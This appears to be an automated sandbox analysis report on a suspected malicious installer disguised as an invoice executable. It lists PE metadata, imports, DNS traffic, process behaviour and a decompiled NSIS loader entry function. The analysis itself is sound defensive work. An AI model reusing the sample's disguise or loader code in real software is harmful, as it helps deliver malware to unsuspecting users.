call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8438	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3ac000	0x988	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6230	0x6400	False	0.6699609375	data	6.44188995255	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1274	0x1400	False	0.4337890625	data	5.06106734837	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x399078	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x3a4000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3ac000	0x988	0xa00	False	0.455859375	data	4.32856157213	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x3ac148	0x100	data	English	United States
RT_DIALOG	0x3ac248	0x11c	data	English	United States
RT_DIALOG	0x3ac364	0x60	data	English	United States
RT_VERSION	0x3ac3c4	0x284	data	English	United States
RT_MANIFEST	0x3ac648	0x340	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Version Infos

Description	Data
LegalCopyright	Copyright Abkhazian (Latin script)
FileVersion	8.96.29.2
CompanyName	decoration
LegalTrademarks	Hokkaido
Comments	Kalumpang
ProductName	fire escape
FileDescription	Liv
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:19:24.748733044 CET	64646	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:24.815500975 CET	53	64646	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:24.819472075 CET	65298	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:24.877114058 CET	53	65298	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:24.914781094 CET	59123	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:24.963464022 CET	53	59123	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:25.797518015 CET	54531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:25.849179029 CET	53	54531	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:27.152808905 CET	49714	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:27.157238960 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:27.203224897 CET	53	49714	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:27.217155933 CET	53	58028	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:28.116398096 CET	53097	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:28.168422937 CET	53	53097	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:29.382328033 CET	49257	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:29.433185101 CET	53	49257	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:31.136949062 CET	62389	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:31.196739912 CET	53	62389	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:32.192605019 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:32.241115093 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:33.640674114 CET	55854	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:33.692168951 CET	53	55854	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:34.932954073 CET	64549	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:34.985964060 CET	53	64549	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:35.956317902 CET	63153	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:36.006692886 CET	53	63153	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:37.029340982 CET	52991	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:37.078033924 CET	53	52991	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:37.995919943 CET	53700	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:38.048115969 CET	53	53700	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:39.638506889 CET	51726	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:39.690025091 CET	53	51726	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:40.992326975 CET	56794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:41.042370081 CET	53	56794	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:41.936924934 CET	56534	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:41.994188070 CET	53	56534	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:43.097459078 CET	56627	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:43.151063919 CET	53	56627	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:43.579133987 CET	56621	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:43.628026962 CET	53	56621	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:44.060345888 CET	63116	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:44.110486031 CET	53	63116	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:45.027995110 CET	64078	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:45.079440117 CET	53	64078	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:46.233937025 CET	64801	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:46.285182953 CET	53	64801	8.8.8.8	192.168.2.4
Feb 22, 2021 20:19:55.682800055 CET	61721	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:19:55.731451988 CET	53	61721	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:15.065862894 CET	51255	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:15.171834946 CET	53	51255	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:15.849272966 CET	61522	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:15.910923958 CET	53	61522	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:16.489898920 CET	52337	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:16.561069012 CET	53	52337	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:17.059513092 CET	55046	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:17.121670008 CET	53	55046	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:17.154700041 CET	49612	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:17.219367981 CET	53	49612	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:17.638299942 CET	49285	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:17.711520910 CET	53	49285	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:18.341927052 CET	50601	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:18.404094934 CET	53	50601	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:19.047049999 CET	60875	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:19.095602989 CET	53	60875	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:20.018647909 CET	56448	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:20.069063902 CET	53	56448	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:20.328011036 CET	59172	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:20.385457039 CET	53	59172	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:20.980401039 CET	62420	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:21.056057930 CET	53	62420	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:22.097594976 CET	60579	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:22.156143904 CET	53	60579	8.8.8.8	192.168.2.4
Feb 22, 2021 20:20:35.787730932 CET	50183	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:20:35.847173929 CET	53	50183	8.8.8.8	192.168.2.4
Feb 22, 2021 20:21:05.075010061 CET	61531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:21:05.123740911 CET	53	61531	8.8.8.8	192.168.2.4
Feb 22, 2021 20:21:06.462074995 CET	49228	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:21:06.528007984 CET	53	49228	8.8.8.8	192.168.2.4

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Invoice 6500TH21Y5674.exe PID: 6928 Parent PID: 5948

General

Start time:	20:19:32
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe'
Imagebase:	0x400000
File size:	215032 bytes
MD5 hash:	DC22D7783144CFE4DCBB4734ED6A3656
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 7116 Parent PID: 6928

General

Start time:	20:19:34
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 736
Imagebase:	0xf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Invoice 6500TH21Y5674.exe PID: 6928 Parent PID: 5948 Invoice 6500TH21Y5674.exeCOMMON

Executed Functions

Function 00403325, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x7a2f6c = _t42;
				if(_t42 != 6) {
					_t119 = E004064DD(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E0040646F(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E004064DD(0xb);
				 *0x7a2f64 = E004064DD(9);
				_t47 = E004064DD(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x7a2f6f =  *0x7a2f6f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x7a3038 = _t47;
				SHGetFileInfoA(0x79e528, 0, _t164 + 0x38, 0x160, 0); // executed
				E004060D4(0x7a2760, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe\" ";
				E004060D4(_t160, _t51);
				 *0x7a2f60 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M007A9001;
				}
				_t55 = CharNextA(E00405A97(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405A97(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E004032F4(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040380D();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x7a3014;
													if( *0x7a3014 == 0) {
														L67:
														_t63 =  *0x7a302c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E004064DD(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E004057F0( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x7a2f80 == 0) {
												L42:
												 *0x7a302c =  *0x7a302c | 0xffffffff;
												 *(_t164 + 0x18) = E004038E7( *0x7a302c);
												goto L43;
											}
											_t153 = E00405A97(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E0040575B(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\jones\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E0040573E();
														} else {
															E004056C1();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
														}
														E004060D4(0x7a4000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x7a4400 = "A";
														do {
															E00406167(0, 0x79e128, _t157, 0x79e128,  *((intOrPtr*)( *0x7a2f74 + 0x120)));
															DeleteFileA(0x79e128);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe", 0x79e128, 1) != 0) {
																E00405EB3(_t137, 0x79e128, 0);
																E00406167(0, 0x79e128, _t157, 0x79e128,  *((intOrPtr*)( *0x7a2f74 + 0x124)));
																_t94 = E00405773(0x79e128);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x7a4400 =  *0x7a4400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405EB3(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405B5A(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E004032F4(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E004032F4(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x7a3020 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403335
0x00403339
0x00403341
0x00403345
0x0040334a
0x00403356
0x0040335f
0x00403364
0x00403367
0x0040336e
0x00403375
0x00403375
0x0040336e
0x00403377
0x0040337c
0x0040337d
0x00403389
0x0040338d
0x00403393
0x004033a1
0x004033a6
0x004033ad
0x004033b1
0x004033b5
0x004033b7
0x004033b7
0x004033b5
0x004033bf
0x004033c6
0x004033cc
0x004033e2
0x004033f2
0x004033f7
0x004033fd
0x00403404
0x00403410
0x0040341a
0x0040341c
0x0040341e
0x00403423
0x00403423
0x00403433
0x00403439
0x00403502
0x00403502
0x00403504
0x00403506
0x00000000
0x00000000
0x00403442
0x00403445
0x0040344d
0x0040344d
0x00403450
0x00403455
0x00403457
0x00403457
0x00403458
0x00403458
0x0040345d
0x00403460
0x004034f2
0x004034f7
0x004034fc
0x004034ff
0x00403501
0x00403501
0x00403501
0x00000000
0x00403466
0x00403466
0x00403467
0x0040346a
0x00403482
0x004034ad
0x004034af
0x004034c2
0x004034ed
0x004034f0
0x0040350e
0x00403511
0x0040351a
0x0040351f
0x00403525
0x00403530
0x00403532
0x00403537
0x00403539
0x00403591
0x00403596
0x004035a0
0x004035a7
0x004035ab
0x0040363f
0x0040363f
0x00403644
0x0040364a
0x0040364f
0x00403773
0x00403779
0x004037f5
0x004037f5
0x004037fa
0x004037fd
0x004037ff
0x004037ff
0x00403807
0x00403807
0x00403789
0x00403791
0x00403793
0x00403794
0x004037a1
0x004037b4
0x004037bc
0x004037c0
0x004037c0
0x004037c8
0x004037cd
0x004037d4
0x004037e2
0x004037e4
0x004037ea
0x004037ec
0x00000000
0x00000000
0x00000000
0x004037d6
0x004037dc
0x004037de
0x004037e0
0x004037ee
0x004037f0
0x00000000
0x004037f0
0x00000000
0x004037e0
0x004037d4
0x0040365e
0x00403665
0x00403665
0x004035b7
0x0040362f
0x0040362f
0x0040363b
0x00000000
0x0040363b
0x004035c0
0x004035c4
0x004035fa
0x004035fa
0x004035fc
0x00403604
0x00403676
0x00403678
0x0040367f
0x00403687
0x00403687
0x00403692
0x00403697
0x004036a6
0x004036aa
0x004036ab
0x004036b4
0x004036ad
0x004036ad
0x004036ad
0x004036ba
0x004036c0
0x004036c6
0x004036ce
0x004036ce
0x004036dc
0x004036e1
0x004036f3
0x004036fb
0x00403701
0x0040370d
0x00403713
0x0040371d
0x00403733
0x00403744
0x0040374a
0x00403751
0x00403754
0x0040375a
0x0040375a
0x00403751
0x0040375e
0x00403764
0x00403764
0x00403769
0x00403769
0x00000000
0x004036a6
0x00403606
0x00403608
0x00403613
0x00000000
0x00000000
0x0040361b
0x00403626
0x0040362b
0x00000000
0x0040362b
0x004035ef
0x004035f1
0x004035f5
0x004035f8
0x00000000
0x00000000
0x00000000
0x004035f8
0x00000000
0x004035f1
0x00403541
0x0040354d
0x00403552
0x00403557
0x00403559
0x00000000
0x00000000
0x00403561
0x00403569
0x0040357a
0x00403582
0x00403584
0x00403589
0x0040358b
0x00000000
0x00000000
0x00000000
0x0040358b
0x00000000
0x004034f0
0x004034b1
0x004034b4
0x004034b7
0x004034bd
0x004034bd
0x004034bd
0x004034bd
0x00000000
0x004034bd
0x004034b9
0x004034bb
0x00000000
0x00000000
0x00000000
0x004034bb
0x0040346c
0x0040346f
0x00403472
0x00403478
0x00403478
0x00000000
0x00403478
0x00403474
0x00403476
0x00000000
0x00000000
0x00000000
0x00403476
0x00000000
0x00000000
0x00000000
0x00403447
0x00403447
0x00403447
0x00403448
0x00403448
0x00000000
0x00403447
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 0040334A
GetVersion.KERNEL32 ref: 00403350
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403383
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033BF
OleInitialize.OLE32(00000000), ref: 004033C6
SHGetFileInfoA.SHELL32(0079E528,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033E2
GetCommandLineA.KERNEL32(007A2760,NSIS Error,?,00000007,00000009,0000000B), ref: 004033F7
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,00000020,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403433
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403530
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403541
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354D
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403561
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403569
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040357A
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403582
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403596

Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A

Part of subcall function 004038E7: lstrlenA.KERNEL32(007A1F00,?,?,?,007A1F00,00000000,C:\Users\user\AppData\Local\Temp,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,73BCFA90), ref: 004039D7
